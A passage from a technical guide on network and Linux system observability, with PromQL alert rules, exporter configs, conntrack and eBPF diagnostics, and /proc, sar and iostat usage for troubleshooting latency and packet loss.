|Buffer bloat|Excessive queuing in network buffers causing latency|High RTT variance, throughput without loss|Latency unpredictability|
|MTU mismatch|Fragmentation caused by differing MTU across path|ICMP fragmentation needed messages, packet count anomaly|Silent packet drops on VXLAN/overlay networks|
|NIC errors|Hardware-level receive/transmit errors|`node_network_receive_errs_total`, `node_network_transmit_errs_total`|Silent data corruption risk, performance degradation|
### Critical Failure: MTU in Kubernetes Overlay Networks
MTU mismatches are among the most insidious network problems in Kubernetes environments. VXLAN encapsulation (used by Flannel, Calico in VXLAN mode, and Weave) adds 50 bytes of overhead to each packet. If the underlying network has a standard 1500-byte MTU and the Kubernetes CNI is configured with a 1450-byte MTU (correctly accounting for VXLAN overhead), packets fit within the MTU without fragmentation.
If the CNI MTU is misconfigured at 1500 bytes (matching the physical interface), packets with VXLAN encapsulation exceed the 1500-byte physical MTU. The result is either IP fragmentation (adding latency and CPU overhead) or silent packet drop if the path has DF (Don't Fragment) bit set. The failure mode is intermittent and load-dependent — small packets are unaffected, only large packets trigger the problem. This explains why services seem to work in testing (low-volume, small payloads) but degrade under production load (high-volume, large payloads).
Detection: monitor `node_network_receive_drop_total` and watch for correlated TCP retransmission increases.
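A sketch of that correlation in PromQL — the overlay-interface regex is an assumption and should be adjusted to match your CNI's device naming:

```promql
# Nodes where overlay-interface drops and TCP retransmissions rise together:
# a typical signature of an MTU/fragmentation problem
rate(node_network_receive_drop_total{device=~"flannel.*|vxlan.*|cali.*"}[5m]) > 0
and on(instance)
rate(node_netstat_Tcp_RetransSegs[5m]) > 1
```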
### TCP Metrics and Network Telemetry
The Linux kernel tracks detailed TCP statistics in `/proc/net/netstat` and `/proc/net/snmp`. These statistics expose the internal behavior of the TCP stack, providing visibility that no application-level monitoring can match.
|TCP Metric|Kernel Counter|Prometheus Metric|Meaning|
|---|---|---|---|
|RTT|Measured per connection by kernel|Available via eBPF tools, ss -ti|Per-connection round-trip time|
|Retransmissions|`TcpExt_TCPRetransFail`, `Tcp_RetransSegs`|`node_netstat_Tcp_RetransSegs`|Packets resent due to loss/timeout|
|Congestion window|Per-connection CWND|Available via eBPF, ss -ti|Current send window size|
|SYN cookies|`TcpExt_SyncookiesSent`|`node_netstat_TcpExt_SyncookiesSent`|Backlog overflow events (attack or overload)|
|OFO queue|`TcpExt_TCPOFOQueue`|`node_netstat_TcpExt_TCPOFOQueue`|Out-of-order packet reception|
|Fast retransmits|`TcpExt_TCPFastRetrans`|`node_netstat_TcpExt_TCPFastRetrans`|SACK-based loss recovery|
|Timeouts|`TcpExt_TCPTimeouts`|`node_netstat_TcpExt_TCPTimeouts`|RTO-based timeout retransmissions|
|New connections|`Tcp_ActiveOpens`, `Tcp_PassiveOpens`|`node_netstat_Tcp_ActiveOpens`|Connection establishment rate|
|Connection resets|`Tcp_EstabResets`|`node_netstat_Tcp_EstabResets`|Connections reset in ESTABLISHED state|
**Interpreting retransmission rate:**
```promql
# TCP retransmission rate per second
rate(node_netstat_Tcp_RetransSegs[5m])
# Retransmission ratio (retransmits as % of total segments sent)
rate(node_netstat_Tcp_RetransSegs[5m])
/ rate(node_netstat_Tcp_OutSegs[5m])
```
A retransmission ratio above 0.1% (1 in 1000 segments) indicates significant packet loss. Above 1% is a serious network health issue. Above 5% will cause application-visible latency and throughput degradation.
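Those thresholds translate directly into an alerting rule; a minimal sketch alerting at the 1% level:

```yaml
- alert: HighTCPRetransmissionRatio
  expr: |
    rate(node_netstat_Tcp_RetransSegs[5m])
      / rate(node_netstat_Tcp_OutSegs[5m]) > 0.01
  for: 10m
  labels:
    severity: warning
  annotations:
    summary: ">1% of TCP segments retransmitted on {{ $labels.instance }}"
```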
**Detecting SYN backlog overflow:**
```promql
# SYN cookies being sent = listen backlog is overflowing
rate(node_netstat_TcpExt_SyncookiesSent[5m]) > 0
```
If SYN cookies are being sent, the application's listen backlog is full. Connections are not being refused, but they are being processed through a slower, degraded path. This indicates either an attack (SYN flood) or a service whose `net.core.somaxconn` and `net.ipv4.tcp_max_syn_backlog` need tuning.
### Network Interface Metrics with node_exporter
node_exporter exposes per-interface metrics from `/proc/net/dev` with the `node_network_` prefix:
```promql
# Network interface throughput (bytes per second)
rate(node_network_receive_bytes_total{device!="lo"}[5m])
rate(node_network_transmit_bytes_total{device!="lo"}[5m])
# Interface utilization (assuming 1Gbps = 125MB/s interface)
rate(node_network_receive_bytes_total{device="eth0"}[5m]) / 125000000
# Receive/transmit error rate
rate(node_network_receive_errs_total{device="eth0"}[5m])
rate(node_network_transmit_errs_total{device="eth0"}[5m])
# Packet drop rate (distinct from errors — dropped by kernel, not rejected by hardware)
rate(node_network_receive_drop_total{device="eth0"}[5m])
rate(node_network_transmit_drop_total{device="eth0"}[5m])
# Packet rate (for latency estimation from bytes + packets)
rate(node_network_receive_packets_total{device="eth0"}[5m])
# Alert: receive errors > 0 on production interface
- alert: NetworkInterfaceErrors
expr: rate(node_network_receive_errs_total{device=~"eth.*|ens.*|bond.*"}[5m]) > 0
for: 5m
labels:
severity: warning
annotations:
summary: "Network errors on {{ $labels.instance }} interface {{ $labels.device }}"
```
### Network Monitoring with Prometheus Exporters
|Exporter|Deployment|Metrics Scope|Key Use Cases|
|---|---|---|---|
|node_exporter|DaemonSet / systemd|NIC throughput, errors, drops, TCP stats|Host-level network health|
|blackbox_exporter|Central deployment|Endpoint availability, latency, TLS validity|External/internal connectivity probing|
|snmp_exporter|Central deployment|Switch/router interface stats, VLAN metrics|Physical network device monitoring|
|ebpf_exporter|DaemonSet (privileged)|Kernel-level TCP, socket, flow metrics|Deep packet-level observability|
|ipvs_exporter|DaemonSet|Kubernetes service load balancer stats|kube-proxy IPVS table metrics|
**blackbox_exporter for internal service probing:**
The blackbox exporter is the correct tool for validating that network paths between services are healthy, independent of whether the services themselves are healthy. A successful application-level healthcheck does not prove that the network path is low-latency and reliable; a blackbox probe measures the round-trip including network traversal.
```yaml
# Prometheus scrape config for internal network path probing
- job_name: 'internal_tcp_probe'
metrics_path: /probe
params:
module: [tcp_connect]
static_configs:
- targets:
- postgres.payments.svc.cluster.local:5432
- redis.cache.svc.cluster.local:6379
- kafka.messaging.svc.cluster.local:9092
relabel_configs:
- source_labels: [__address__]
target_label: __param_target
- source_labels: [__param_target]
target_label: instance
- target_label: __address__
replacement: blackbox-exporter:9115
# Key metrics from probe
# probe_success: 0 = connection failed, 1 = success
# probe_duration_seconds: total probe duration including TCP handshake
# probe_tcp_duration_seconds: TCP connect time specifically
```
```promql
# Alert on failed internal connectivity
- alert: InternalConnectivityFailed
expr: probe_success{job="internal_tcp_probe"} == 0
for: 1m
labels:
severity: critical
annotations:
summary: "Cannot connect to {{ $labels.instance }}"
# Alert on elevated TCP connect latency (network path degradation)
- alert: InternalConnectivityHighLatency
expr: probe_tcp_duration_seconds{job="internal_tcp_probe"} > 0.1
for: 5m
labels:
severity: warning
annotations:
summary: "TCP connect to {{ $labels.instance }} taking {{ $value }}s"
```
**snmp_exporter for physical network monitoring:**
```yaml
# snmp.yml — Cisco interface monitoring
modules:
cisco_c9k:
walk:
- 1.3.6.1.2.1.2.2.1.2 # ifDescr
- 1.3.6.1.2.1.2.2.1.5 # ifSpeed
- 1.3.6.1.2.1.2.2.1.8 # ifOperStatus
- 1.3.6.1.2.1.31.1.1.1.6 # ifHCInOctets (64-bit)
- 1.3.6.1.2.1.31.1.1.1.10 # ifHCOutOctets (64-bit)
- 1.3.6.1.2.1.2.2.1.14 # ifInErrors
- 1.3.6.1.2.1.2.2.1.20 # ifOutErrors
metrics:
- name: ifHCInOctets
oid: 1.3.6.1.2.1.31.1.1.1.6
type: counter
help: "High-capacity counter for inbound octets"
- name: ifOperStatus
oid: 1.3.6.1.2.1.2.2.1.8
type: gauge
help: "Current operational state: 1=up, 2=down, 7=lowerLayerDown"
```
### Connection Tracking (conntrack)
Linux's Netfilter connection tracking subsystem maintains state for every active and recently-closed network connection traversing the host. This state is used by the firewall (iptables/nftables) for stateful packet filtering, by NAT for address translation, and by Kubernetes kube-proxy for service load balancing.
The conntrack table has a maximum size (`nf_conntrack_max`). When this limit is reached, new connections are dropped silently — without sending a TCP RST or ICMP error. This is one of the most operationally dangerous failure modes in high-traffic Linux systems because it produces no application-level error message; connections simply stop working.
**Connection states:**
|State|Meaning|Normal Duration|
|---|---|---|
|`NEW`|First packet seen, awaiting response|Milliseconds|
|`SYN_SENT`|SYN sent, waiting for SYN-ACK|< 1 second (or timeout)|
|`SYN_RECV`|SYN-ACK sent, waiting for ACK|< 1 second|
|`ESTABLISHED`|Full three-way handshake complete, data flowing|Lifetime of connection|
|`FIN_WAIT`|Local side sent FIN, half-closed|Seconds to minutes|
|`CLOSE_WAIT`|Remote side sent FIN, waiting for local close|Depends on application|
|`LAST_ACK`|Both FINs sent, waiting for final ACK|Seconds|
|`TIME_WAIT`|Connection closed, waiting for delayed packets|60-120 seconds (2×MSL)|
|`CLOSE`|Connection fully closed|Immediate|
**TIME_WAIT accumulation** is a common operational issue. A service making many short-lived TCP connections (HTTP/1.1 without keepalive, or connection pooling disabled) will accumulate TIME_WAIT entries at the rate of its connection teardown frequency. At 10,000 connections/second, TIME_WAIT entries accumulate faster than the 60-second timeout can drain them, leading to port exhaustion and eventual connection failures.
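The arithmetic behind that claim is Little's law: steady-state entries = arrival rate × lifetime. A sketch, assuming the default Linux ephemeral port range (32768-60999):

```python
def time_wait_steady_state(conns_per_sec: float, timeout_s: float = 60.0) -> float:
    """Little's law: steady-state TIME_WAIT entries = teardown rate x lifetime."""
    return conns_per_sec * timeout_s

# Default net.ipv4.ip_local_port_range is 32768-60999 on most distributions
EPHEMERAL_PORTS = 60999 - 32768 + 1  # 28232 usable client ports

tw_entries = time_wait_steady_state(10_000)
print(tw_entries)                    # → 600000.0
print(tw_entries > EPHEMERAL_PORTS)  # → True: ports to a single destination exhaust
```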
**Inspecting the conntrack table:**
```bash
# List all tracked connections
conntrack -L
# Count by state
conntrack -L | awk '/^tcp/ {print $4}' | sort | uniq -c | sort -rn
# Count entries by destination IP:port (find busy services)
conntrack -L | grep ESTABLISHED | awk '{print $6":"$8}' | \
    sed 's/dst=//; s/dport=//' | sort | uniq -c | sort -rn | head -20
# Watch conntrack table in real time
watch -n1 'conntrack -L 2>/dev/null | wc -l'
# Low-level view directly from kernel
cat /proc/net/nf_conntrack | head -5
# ipv4 2 tcp 6 431999 ESTABLISHED src=10.0.0.1 dst=10.0.0.50 sport=54321 dport=5432 \
#   src=10.0.0.50 dst=10.0.0.1 sport=5432 dport=54321 [ASSURED] mark=0 use=1
# Current vs maximum conntrack entries
cat /proc/sys/net/netfilter/nf_conntrack_count
cat /proc/sys/net/netfilter/nf_conntrack_max
```
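The state-counting one-liners above can be made more robust in a few lines of Python that locate the state token by value, so both the `conntrack -L` and `/proc/net/nf_conntrack` layouts parse identically (sample lines are invented):

```python
from collections import Counter

TCP_STATES = {"ESTABLISHED", "SYN_SENT", "SYN_RECV", "FIN_WAIT", "CLOSE_WAIT",
              "LAST_ACK", "TIME_WAIT", "CLOSE", "NONE"}

def count_states(conntrack_text: str) -> Counter:
    """Count tracked TCP connections by state; the state token is located by
    value, so field offsets do not matter."""
    counts = Counter()
    for line in conntrack_text.splitlines():
        state = next((tok for tok in line.split() if tok in TCP_STATES), None)
        if state:
            counts[state] += 1
    return counts

# Invented sample in `conntrack -L` layout
sample = """\
tcp      6 431999 ESTABLISHED src=10.0.0.1 dst=10.0.0.50 sport=54321 dport=5432
tcp      6 55 TIME_WAIT src=10.0.0.1 dst=10.0.0.50 sport=54322 dport=5432
tcp      6 57 TIME_WAIT src=10.0.0.1 dst=10.0.0.50 sport=54323 dport=5432
"""
by_state = count_states(sample)
print(by_state["TIME_WAIT"], by_state["ESTABLISHED"])  # → 2 1
```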
**Monitoring conntrack saturation with node_exporter:**
```promql
# Current conntrack entries
node_nf_conntrack_entries
# Maximum conntrack entries
node_nf_conntrack_entries_limit
# Conntrack utilization (alert well before 100% to prevent silent drops)
node_nf_conntrack_entries / node_nf_conntrack_entries_limit
# Alert rule
- alert: ConntrackTableNearSaturation
expr: |
node_nf_conntrack_entries / node_nf_conntrack_entries_limit > 0.75
for: 5m
labels:
severity: warning
annotations:
summary: "conntrack table {{ $value | humanizePercentage }} full on {{ $labels.instance }}"
description: "At current rate, connection drops may begin soon. Tune nf_conntrack_max or investigate connection leak."
runbook_url: "https://runbooks.internal/conntrack-saturation"
# Critical — new connections are being dropped
- alert: ConntrackTableFull
expr: |
node_nf_conntrack_entries / node_nf_conntrack_entries_limit > 0.95
for: 1m
labels:
severity: critical
```
**Tuning conntrack for high-traffic environments:**
```bash
# Increase conntrack table size (requires root; persist in /etc/sysctl.d/)
sysctl -w net.netfilter.nf_conntrack_max=2097152
sysctl -w net.netfilter.nf_conntrack_buckets=524288
# Reduce TIME_WAIT timeout for connection-heavy services
sysctl -w net.netfilter.nf_conntrack_tcp_timeout_time_wait=30
sysctl -w net.netfilter.nf_conntrack_tcp_timeout_established=86400
# For services not needing conntrack (internal load-balanced services):
# Use NOTRACK rules to skip conntrack entirely
iptables -t raw -A PREROUTING -p tcp --dport 8080 -j NOTRACK
iptables -t raw -A OUTPUT -p tcp --sport 8080 -j NOTRACK
```
### eBPF Network Observability
eBPF (extended Berkeley Packet Filter) enables network observability at the kernel level with minimal overhead. Unlike traditional packet capture (which copies every packet to userspace) or socket-based monitoring (which requires inserting monitoring code into the data path), eBPF programs run in the kernel itself, executing on every network event at a small fraction of the cost of those approaches.
**How eBPF network observability works:**
1. An eBPF program is loaded into the kernel and attached to a hook point (tracepoint, kprobe, XDP hook, or tc hook)
2. When the hook point is triggered (e.g., a TCP connection is established), the eBPF program executes
3. The program can read kernel data structures (socket buffers, TCP control blocks, routing tables) and write to eBPF maps (shared memory accessible from userspace)
4. A userspace collector reads the eBPF maps and exports the data as Prometheus metrics
This mechanism can observe every TCP connection establishment and teardown, every DNS query, every HTTP/2 frame (without TLS termination), every syscall, and every network packet — at kernel speeds without modifying application code.
**Key eBPF network tools:**
|Tool|Origin|Purpose|Use in Observability|
|---|---|---|---|
|`tcpconnect` (bcc)|BCC tools|Traces every TCP connection establishment|Connection rate analysis, unexpected connections|
|`tcpretrans` (bcc)|BCC tools|Traces TCP retransmissions with addresses|Per-connection retransmit identification|
|`tcptop` (bcc)|BCC tools|Live TCP throughput by process and connection|Find bandwidth-consuming processes|
|`tcplife` (bcc)|BCC tools|Complete TCP session lifecycle with duration and bytes|Connection duration analysis|
|`tcprtt` (bcc)|BCC tools|TCP round-trip time histogram per connection|RTT distribution without tcpdump overhead|
|`xdp-filter`|XDP/eBPF|High-speed packet filtering at NIC driver|DDoS mitigation, L3/L4 filtering|
|Cilium Hubble|Cilium|Full L3-L7 network observability for Kubernetes|Service mesh traffic visibility|
|Pixie|New Relic OSS|Automatic Kubernetes observability via eBPF|Protocol-level traffic analysis without instrumentation|
**Using bcc tools for production network debugging:**
```bash
# Trace all new TCP connections with source/dest/PID
/usr/share/bcc/tools/tcpconnect -t
# TIME(s) PID COMM IP SADDR DADDR SPORT DPORT
# 0.000 15234 payment-svc 4 10.0.1.45 10.0.2.12 54321 5432
# 0.001 15234 payment-svc 4 10.0.1.45 10.0.0.5 54322 6379
# Trace TCP retransmissions (identify flaky paths)
/usr/share/bcc/tools/tcpretrans
# TIME PID IP LADDR:LPORT T> RADDR:RPORT STATE
# 14:23:01 0 4 10.0.1.45:54321 R> 10.0.2.12:5432 ESTABLISHED
# 14:23:01 0 4 10.0.1.45:54321 R> 10.0.2.12:5432 ESTABLISHED
# Watch hostname/DNS resolution latency (find slow or unexpected lookups)
/usr/share/bcc/tools/gethostlatency
# TIME      PID    COMM          LATms HOST
# 14:23:01  15234  payment-svc   12.30 postgres.payments.svc.cluster.local
# Monitor TCP connection lifetimes
/usr/share/bcc/tools/tcplife
# PID COMM LADDR LPORT RADDR RPORT TX_KB RX_KB MS
# 15234 payment 10.0.1.45 54321 10.0.2.12 5432 1.2 45.6 342.1
```
**bpftrace for custom network probes:**
```bash
# Measure per-connection TCP RTT in real time
bpftrace -e '
tracepoint:tcp:tcp_probe
{
@rtt_us = hist(args->srtt); // tcp_probe's srtt field is already srtt_us >> 3
}
interval:s:5
{
print(@rtt_us);
clear(@rtt_us);
}'
# Count connections by destination IP (find unexpected egress)
bpftrace -e '
kprobe:tcp_connect
{
$sk = (struct sock *)arg0;
$daddr = ntop(AF_INET, $sk->__sk_common.skc_daddr);
@connections[$daddr] = count();
}
interval:s:30
{ print(@connections); clear(@connections); }'
```
**ebpf_exporter for Prometheus integration:**
The `ebpf_exporter` by Cloudflare bridges eBPF metrics into Prometheus, allowing kernel-level network observability data to appear in Grafana dashboards alongside application metrics. The sketch below uses the older BCC-based configuration format (ebpf_exporter v2 moved to libbpf and a different config layout):
```yaml
# ebpf_exporter config (v1, BCC-based format)
programs:
  - name: tcp_retransmits
    metrics:
      counters:
        - name: tcp_retransmits_total
          help: TCP retransmit events by process name
          table: counts
          labels:
            - name: comm
              size: 16
              decoders:
                - name: string
    code: |
      #include <net/sock.h>
      struct key_t { char comm[16]; };
      BPF_HASH(counts, struct key_t);
      int kprobe__tcp_retransmit_skb(struct pt_regs *ctx, struct sock *sk) {
          struct key_t key = {};
          bpf_get_current_comm(&key.comm, sizeof(key.comm));
          counts.increment(key);
          return 0;
      }
```
### Cilium Hubble: Service Mesh Network Observability
When Cilium is used as the Kubernetes CNI, Hubble provides L3/L4/L7 network observability across the entire cluster:
```bash
# Install Hubble CLI
export HUBBLE_VERSION=$(curl -s https://raw.githubusercontent.com/cilium/hubble/master/stable.txt)
curl -L --remote-name-all https://github.com/cilium/hubble/releases/download/$HUBBLE_VERSION/hubble-linux-amd64.tar.gz
tar xzf hubble-linux-amd64.tar.gz && sudo mv hubble /usr/local/bin/
# Watch real-time traffic flows
hubble observe --follow
# Filter to a specific namespace
hubble observe --namespace payments --follow
# Show HTTP-level details
hubble observe --protocol http --follow
# Identify dropped connections (policy violations)
hubble observe --verdict DROPPED --follow
# Jun 15 14:23:01.123: payments/payment-service:54321 → database/postgres:5432
# DROPPED (Policy denied)
# Generate service dependency map
hubble observe --output json | \
jq -r '[.source.namespace, .source.workload, .destination.namespace, .destination.workload] | @csv' | \
sort -u
```
Hubble metrics are automatically exported to Prometheus:
```promql
# Dropped-flow rate per service pair (from Hubble)
sum(rate(hubble_flows_processed_total{
verdict="DROPPED",
namespace="payments"
}[5m])) by (source, destination)
# TCP connection rate between services
sum(rate(hubble_tcp_flags_total{
flag="SYN",
namespace="payments"
}[5m])) by (source, destination)
```
### Network Observability Troubleshooting Workflow
The following workflow provides a systematic approach to network-related incident investigation:
```
[1] High latency or error rate detected (metrics alert)
│
▼
[2] Determine if network path is affected
├── Check blackbox_exporter probe latency between services
├── Query: probe_tcp_duration_seconds — elevated?
└── Query: probe_success == 0 — any paths down?
│
▼
[3] Inspect network interface health
├── node_network_receive_errs_total — hardware errors?
├── node_network_receive_drop_total — kernel drops?
└── node_network_receive_bytes_total rate — saturation?
│
▼
[4] Analyze TCP layer
├── node_netstat_Tcp_RetransSegs rate — high retransmits?
├── node_netstat_TcpExt_TCPTimeouts — timeout retransmits?
├── node_netstat_TcpExt_SyncookiesSent > 0 — backlog overflow?
└── ss -s — socket summary (TIME_WAIT count, ESTABLISHED count)
│
▼
[5] Check connection tracking
├── node_nf_conntrack_entries / limit — table saturation?
├── conntrack -L | wc -l — absolute count
└── conntrack -L | grep TIME_WAIT | wc -l — TIME_WAIT accumulation?
│
▼
[6] eBPF-level investigation (if issue unresolved)
├── tcpretrans — which connections are retransmitting?
├── tcpconnect — unexpected connection patterns?
├── bpftrace RTT probe — per-connection latency distribution
└── tcpdump (short capture) — packet-level validation
│
▼
[7] Infrastructure layer
├── Check NIC driver errors (ethtool -S eth0)
├── Check SNMP exporter for upstream switch errors
├── Verify MTU consistency: ip link show — same across path?
└── For Kubernetes: check CNI plugin logs, VXLAN overhead
│
▼
[8] Identify and remediate root cause
├── MTU mismatch → align CNI and physical MTU
├── conntrack saturation → tune nf_conntrack_max, add NOTRACK
├── NIC errors → replace hardware, update driver
├── TIME_WAIT exhaustion → enable keepalive/connection pooling, tune net.ipv4.tcp_tw_reuse
└── Backlog overflow → increase net.core.somaxconn, application backlog
```
---
## 22. Linux System Observability
### Why Linux Observability Is Essential
Every workload in a cloud-native environment ultimately runs on a Linux kernel. Container runtime, Kubernetes kubelet, application processes — all of these are Linux processes consuming Linux kernel resources. Application-level observability tells you what the application is doing; Linux system observability tells you whether the operating system supporting the application is healthy.
The combination is required for complete incident investigation coverage. An application experiencing increased latency might be:
- Waiting for I/O (visible in iostat, `iowait` CPU metric, `/proc/diskstats`)
- Throttled by the CPU scheduler (visible in cgroup CPU metrics, `cpu.stat throttled_time`)
- Waiting for memory allocation (visible in `/proc/meminfo` memory pressure indicators)
- Competing for file descriptors (`/proc/sys/fs/file-nr` vs limit)
- Delayed by system calls being traced or blocked (visible in strace, perf, eBPF)
None of these would produce a direct application error. All would produce elevated latency. Without Linux system observability, the investigation stops at "the application is slow" without the ability to identify why.
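Several of the indicators above can be checked programmatically rather than by eyeballing tool output. A sketch parsing two of them, `/proc/loadavg` and `/proc/sys/fs/file-nr` (sample values are invented):

```python
def parse_loadavg(text: str) -> tuple:
    """Parse /proc/loadavg: 1/5/15-minute load plus runnable/total processes."""
    parts = text.split()
    load1, load5, load15 = (float(p) for p in parts[:3])
    runnable, total = (int(p) for p in parts[3].split("/"))
    return load1, load5, load15, runnable, total

def fd_utilization(file_nr_text: str) -> float:
    """Parse /proc/sys/fs/file-nr (allocated, unused, max) into a utilization ratio."""
    allocated, _unused, maximum = (int(p) for p in file_nr_text.split())
    return allocated / maximum

# Invented sample values
print(parse_loadavg("2.45 2.12 1.87 3/1245 15234"))  # → (2.45, 2.12, 1.87, 3, 1245)
print(f"{fd_utilization('21504 0 1048576'):.1%}")    # → 2.1%
```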
### Linux Telemetry Sources
The Linux kernel exposes its internal state through a hierarchy of virtual filesystems and interfaces:
|Source|Type|Description|Refresh Rate|Primary Consumer|
|---|---|---|---|---|
|`/proc`|Virtual filesystem|Process and kernel runtime statistics|Per-read (real-time)|node_exporter, ps, top|
|`/sys`|Virtual filesystem|Kernel configuration and device attributes|Per-read|node_exporter, udevadm|
|`cgroups v2`|Virtual filesystem|Resource accounting and limits per process group|Per-read|Kubernetes, node_exporter|
|`netfilter`|Kernel subsystem|Network connection tracking and firewall statistics|Per-read via /proc|node_exporter, conntrack|
|`perf_events`|Syscall interface|Hardware performance counters, software events, tracepoints|Sampling-based|perf, BCC tools|
|`ftrace`|Kernel tracing|Function-level kernel tracing|Continuous|trace-cmd, perf-ftrace|
|`kprobes/uprobes`|Dynamic instrumentation|Dynamic attachment to kernel/user functions|On-demand|eBPF, SystemTap|
|`tracepoints`|Static instrumentation|Pre-defined kernel trace hooks|On-demand|eBPF, perf, LTTng|
|`IPMI/BMC`|Hardware interface|Hardware health (temperature, fan, power)|Polled|ipmi_exporter|
### /proc Filesystem Deep Dive
The `/proc` filesystem is the primary interface between observability tools and the Linux kernel. Every major Linux metrics exporter reads from `/proc`.
**Critical /proc paths for observability:**
|Path|Content|Key Data|Tool|
|---|---|---|---|
|`/proc/stat`|CPU time per state per core|user, system, iowait, steal, idle|node_exporter: `node_cpu_seconds_total`|
|`/proc/meminfo`|Memory subsystem statistics|MemTotal, MemFree, MemAvailable, Cached, Buffers, SwapTotal/SwapFree|node_exporter: `node_memory_*`|
|`/proc/loadavg`|System load averages|1/5/15 minute load, runnable/total processes|node_exporter: `node_load1/5/15`|
|`/proc/diskstats`|Block device I/O statistics|reads/writes, sectors, I/O time|node_exporter: `node_disk_*`|
|`/proc/net/dev`|Network interface statistics|bytes/packets/errors/drops per interface|node_exporter: `node_network_*`|
|`/proc/net/tcp`|TCP socket table|all TCP connections with state and address|ss, netstat|
|`/proc/net/snmp`|SNMP MIB-II network statistics|TCP/UDP/IP counters|node_exporter: `node_netstat_*`|
|`/proc/net/netstat`|Extended TCP statistics|Detailed TCP event counters|node_exporter: `node_netstat_TcpExt_*`|
|`/proc/sys/net/netfilter/nf_conntrack_count`|Current conntrack entries|Active connection count|node_exporter: `node_nf_conntrack_entries`|
|`/proc/sys/fs/file-nr`|File descriptor usage|Allocated, unused, max FDs|node_exporter: `node_filefd_allocated`|
|`/proc/[pid]/stat`|Per-process statistics|CPU time, memory, state, threads|node_exporter: `node_processes_*`|
|`/proc/[pid]/fd/`|Per-process open file descriptors|Count of open FDs per process|lsof|
|`/proc/buddyinfo`|Kernel memory fragmentation|Available memory per order per zone|Useful for large allocation failure diagnosis|
|`/proc/vmstat`|Virtual memory statistics|Page faults, swaps, compaction events|node_exporter: `node_vmstat_*`|
|`/proc/interrupts`|Hardware interrupt counts|Interrupts per CPU per source|Useful for IRQ imbalance diagnosis|
**Reading /proc directly:**
```bash
# CPU utilization (parse /proc/stat)
# Format: cpu user nice system idle iowait irq softirq steal guest guest_nice
cat /proc/stat | head -5
# Memory pressure (available vs total)
awk '/MemAvailable|MemTotal/{print $1, $2, $3}' /proc/meminfo
# MemTotal: 32768000 kB
# MemAvailable: 8192000 kB
# System load
cat /proc/loadavg
# 2.45 2.12 1.87 3/1245 15234
# (1min) (5min) (15min) (running/total) (last pid)
# All TCP connections with state
cat /proc/net/tcp | head -5
# sl local_address rem_address st tx_queue rx_queue tr tm->when retrnsmt uid timeout inode
# 0: 0100007F:0277 00000000:0000 0A 00000000:00000000 00:00000000 00000000 0 0 ...
# (hex encoded addresses, st=0A means LISTEN)
# File descriptor usage
cat /proc/sys/fs/file-nr
# 21504 0 9223372036854775807
# (allocated, unused, max)
```
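Because `/proc/stat` exposes cumulative tick counters, utilization must be computed from the delta between two snapshots, which is exactly what top and node_exporter's `rate()` do. A minimal sketch (synthetic snapshots; only the first eight fields of the aggregate `cpu` line are used):

```python
def cpu_percent(stat_t0: str, stat_t1: str) -> dict:
    """Per-mode CPU utilization (%) between two /proc/stat snapshots, using the
    aggregate 'cpu' line (user nice system idle iowait irq softirq steal)."""
    modes = ["user", "nice", "system", "idle", "iowait", "irq", "softirq", "steal"]

    def parse(text: str) -> list:
        for line in text.splitlines():
            if line.startswith("cpu "):
                return [int(v) for v in line.split()[1:9]]
        raise ValueError("no aggregate cpu line in /proc/stat snapshot")

    t0, t1 = parse(stat_t0), parse(stat_t1)
    deltas = [b - a for a, b in zip(t0, t1)]
    total = sum(deltas)
    return {m: 100.0 * d / total for m, d in zip(modes, deltas)}

# Synthetic snapshots: 500 user ticks, 100 system, 500 idle, 100 iowait elapsed
t0 = "cpu  1000 0 200 8000 300 0 0 0 0 0"
t1 = "cpu  1500 0 300 8500 400 0 0 0 0 0"
pct = cpu_percent(t0, t1)
print(round(pct["user"]), round(pct["iowait"]))  # → 42 8
```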
### Classic Linux Performance Tools
**top / htop**
`top` provides a live view of the system's most resource-consuming processes, system load averages, and CPU/memory overview. For observability purposes, the key metrics:
- **%us (user):** CPU time in user-space processes. High user% with high application latency indicates CPU-bound workload.
- **%sy (system):** CPU time in kernel context. Elevated system% indicates heavy syscall activity, I/O operations, or kernel work.
- **%wa (iowait):** CPU time waiting for I/O completion. Elevated iowait indicates the CPU is underutilized because processes are blocked on disk or network I/O.
- **%st (steal):** CPU cycles stolen by the hypervisor in virtualized environments. Elevated steal indicates host CPU overcommitment — the VM is not getting the CPU it requests.
- **load average:** 1/5/15 minute averages of the number of processes in runnable or uninterruptible state. A load average consistently greater than the CPU count indicates saturation.
```bash
# Non-interactive top snapshot (3 iterations, 1 second interval)
top -b -n 3 -d 1
# Watch specific process
top -p $(pgrep payment-service)
# Sort by memory
top -o %MEM
# htop with per-CPU bars, tree view, and filtering
htop --tree
```
**sar (System Activity Reporter)**
`sar` collects, reports, and saves system activity information. It is particularly valuable for historical performance analysis — when an incident occurred at 2am, `sar` data from that time provides the OS-level context.
```bash
# CPU utilization (every 2 seconds, 5 times)
sar -u 2 5
# Time CPU %user %nice %system %iowait %steal %idle
# 14:23:01 all 45.23 0.00 12.45 8.90 0.00 33.42
# Memory usage
sar -r 2 5
# Time kbmemfree kbavail kbmemused %memused kbbuffers kbcached
# 14:23:01 512000 2048000 30720000 93.75 131072 8192000
# Network interface throughput
sar -n DEV 2 5
# Time IFACE rxpck/s txpck/s rxkB/s txkB/s
# 14:23:01 eth0 45678.0 23456.0 5432.1 1234.5
# Disk I/O statistics
sar -b 2 5
# Time tps rtps wtps bread/s bwrtn/s
# 14:23:01 1234.0 456.0 778.0 23456.0 45678.0
# Historical CPU from sar data files
sar -u -f /var/log/sysstat/sa$(date +%d -d yesterday)
```
**iostat**
`iostat` reports CPU utilization and I/O statistics for block devices. It is the primary tool for diagnosing disk I/O bottlenecks.
```bash
# Extended device statistics, 1-second interval
iostat -x 1
# Key output fields:
# r/s, w/s — Read/write operations per second (IOPS)
# rkB/s, wkB/s — Read/write throughput in KB/s
# await — Average I/O service time in milliseconds
# r_await — Average read latency
# w_await — Average write latency
# %util — Percentage of time device was busy (100% = saturated)
# svctm — Average service time (deprecated, use await)
# avgqu-sz — Average I/O queue depth
# Example output showing a saturated disk:
# Device r/s w/s rkB/s wkB/s await %util
# nvme0n1 12345.0 678.0 98765.0 5432.0 18.5 98.2 ← 98% util, 18ms await
```
**Prometheus metrics equivalent of iostat:**
```promql
# IOPS (reads per second)
rate(node_disk_reads_completed_total{device="nvme0n1"}[5m])
# Write throughput (bytes per second)
rate(node_disk_written_bytes_total{device="nvme0n1"}[5m])
# Average I/O latency (await equivalent)
rate(node_disk_io_time_seconds_total{device="nvme0n1"}[5m])
/ (rate(node_disk_reads_completed_total{device="nvme0n1"}[5m])
+ rate(node_disk_writes_completed_total{device="nvme0n1"}[5m]))
# Disk utilization
